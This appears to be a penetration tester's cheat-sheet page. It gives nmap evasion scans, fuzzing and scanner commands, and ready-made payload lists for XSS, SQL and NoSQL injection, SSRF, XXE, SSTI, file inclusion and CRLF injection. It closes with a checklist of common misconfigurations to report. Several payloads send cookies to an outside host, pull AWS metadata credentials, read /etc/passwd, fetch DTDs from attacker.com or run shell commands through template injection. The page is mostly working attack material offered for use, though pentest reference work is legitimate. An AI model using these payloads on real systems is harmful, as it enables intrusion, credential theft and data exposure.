Handy Commands & Payloads

Commands and Payloads that I use the most to get the basics covered.

Nmap

Initial Port Scan and Service Scan with Evasive Techniques:

nmap -f -D RND:10 -p- -Pn $TARGET

nmap -sC -sV -p $(nmap -f -D RND:10 -p- -Pn $TARGET | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',') $TARGET

Other nmap scans:

sudo nmap -Pn -p 3389 -ff -send-eth -script rdp-enum-encryption $IP

Test SSL

testssl $URL

Nikto

nikto -host $URL
nikto -h $URL -O STATIC-COOKIE="Authorization: Bearer..."

Nuclei

nuclei -u $URL
nuclei -u $URL -H "cookie: "

# Use secrets.yaml file for other authentication mechanisms

Nuclei Fuzzer

nf -d $URL

Directory Fuzzing

Gobuster:

gobuster dir -u $URL -t 20 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -b 302,404 -o gobuster_dir.txt

ffuf (Basic):

ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -mc 200 -c -r -sf -t 20 -o ffuf_dir.csv -of csv

Ffuf (API):

ffuf -request api.req -w /opt/SecLists/Discovery/Web-Content/api/common-paths,actions-lowercase,/opt/SecLists/Fuzzing/special-chars.txt -request-proto http -mc 200 -c -r -sf -o fuff_api_dir.csv -of csv

VHOST Fuzzing

ffuf -H "Host: FUZZ.collect.htb" -u http://collect.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -c -r -sf -ac -o subd_ffuf.txt

SQLi

sqlmap -r app.req --level 5 --risk 3 --batch

XSS Best Payloads

<script>alert(1)</script>
<script src=//14.rs></script>
"><svg onload=alert()>
<embed src=//14.rs>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<a href=javascript:confirm()>click here

SQL Injection Payloads

' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /* 
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #

NoSQL Injection Payloads

{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$in": [""]}}
{"username": "admin", "password": {"$where": "this.password.length > 0"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$ne": "admin"}, "password": {"$exists": true}}
{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "password"}}

SSRF Payloads

# Retrieve AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/macs/

http://127.0.0.1:80
http://127.0.0.1:8080
http://localhost:80
http://localhost:8080
http://0.0.0.0:80
http://0.0.0.0:8080
http://[::]:80
http://[::]:8080
http://[::1]:80
http://[::1]:8080
http://internal-service:80
http://internal-service:8080

XXE Payloads

xmlCopy code<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "jar:http://attacker.com/evil.jar!/" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "gopher://attacker.com/evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "data:text/plain,evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://input" > ]><foo>&xxe;</foo>

SSTI Payloads

# jinja
{{7*7}}
{{7*'7'}}
{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{{c}}
{% endfor %}
{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}
{{request.application.__globals__.__builtins__.open('index.html').read()}}

File Inclusion Payloads

../../../../../../etc/passwd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../winnt/win.ini
../../../../../../windows/system.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../winnt/system32/drivers/etc/hosts
../../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../usr/local/apache/logs/access.log
../../../../../../usr/local/apache/logs/error.log
../../../../../../var/www/html/index.php
../../../../../../var/www/html/wp-config.php
../../../../../../usr/local/etc/php.ini
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/mysql/my.cnf

CRLF Injection Payloads

GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n

POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

Easy Vulnerabilities & Security Misconfigurations to Report

Vulnerabilities that could be found in the early stages (first few hours) of a pentest.

Security Headers

Misconfigured Security Headers:
- X-Frame-Options
- X-XSS-Protection
- X-Content-Type-Options
- Strict-Transport-Security
- Content-Security-Policy (CSP)
- Referrer-Policy

Insecure CORS Configuration:
- Allowing wildcard (*) origin
- Allowing untrusted origins
- Lack of proper validation

Insecure Cookie Attributes:
- Missing HttpOnly flag
- Missing Secure flag
- Missing SameSite attribute

Authentication & Session Management

Concurrent Logins Allowed:
- Multiple sessions from different IPs
Improper Session Timeout:
- Long or no session expiration
Improper Invalidation of Cookie Post Logout:
- Session remains active after logout
Weak Password Policies:
- No complexity requirements
- Lack of rate limiting

File Handling

Unrestricted File Upload:
- No file type validation
- No file size restrictions
- No scanning for malware

Access Controls

Staging Environment Accessible from External Network:
- Exposed internal environments
Sensitive Directories Accessible:
- /.git/, /.svn/, /backup/, /config/

Web Server Configuration

Clickjacking:
- Missing X-Frame-Options header
Weak SSL Ciphers:
- Use of deprecated SSL/TLS versions
- Weak cipher suites enabled
Web Server Fingerprinting:
- Banner Grabbing revealing server information

Information Disclosure

Verbose Error Messages:
- Detailed stack traces
- Application/Server details in error messages
Directory Listing Enabled:
- Ability to list files in web directories

Business Logic & Other Issues

Lack of Rate Limiting:
- Brute force or DoS vulnerabilities
No Account Lockout:
- Unlimited login attempts
Weak Default Credentials:
- Use of default passwords for admin accounts
HTTP Methods:
- TRACE/TRACK methods enabled
Referrer Policy:
- No Referrer Policy header
API Security:
- Lack of authentication
- Lack of rate limiting
- Exposed sensitive endpoints
Insecure Direct Object References (IDOR):
- Direct access to unauthorized resources
Lack of Input Validation:
- No sanitization of user input

Additional Points

Backup Files Accessible:
- .bak, .old, .save files accessible
Exposed API Keys or Tokens:
- API keys or tokens in URLs, JavaScript, etc.
Insufficient Logging and Monitoring:
- Lack of logging for security events
Cross-Site Request Forgery (CSRF):
- Missing or incorrect CSRF tokens
Insufficient Transport Layer Security:
- HTTP instead of HTTPS
Autocomplete Enabled for Sensitive Fields:
- Sensitive form fields have autocomplete enabled
Insecure Directories:
- /admin/, /config/, /backup/ directories exposed
Insecure Third-Party Integrations:
- Unpatched or outdated third-party libraries and frameworks

PreviousCORS Misconfiguration NextActive Directory Pentest

Last updated 1 year ago

hashtagNmap

hashtagTest SSL

hashtagNikto

hashtagNuclei

hashtagNuclei Fuzzer

hashtagDirectory Fuzzing

hashtagVHOST Fuzzing

hashtagSQLi

hashtagXSS Best Payloads

hashtagSQL Injection Payloads

hashtagNoSQL Injection Payloads

hashtagSSRF Payloads

hashtagXXE Payloads

hashtagSSTI Payloads

hashtagFile Inclusion Payloads

hashtagCRLF Injection Payloads

hashtagEasy Vulnerabilities & Security Misconfigurations to Report

hashtagSecurity Headers

hashtagCross-Origin Resource Sharing (CORS)

hashtagCookie Attributes

hashtagAuthentication & Session Management

hashtagFile Handling

hashtagAccess Controls

hashtagWeb Server Configuration

hashtagInformation Disclosure

hashtagBusiness Logic & Other Issues

hashtagAdditional Points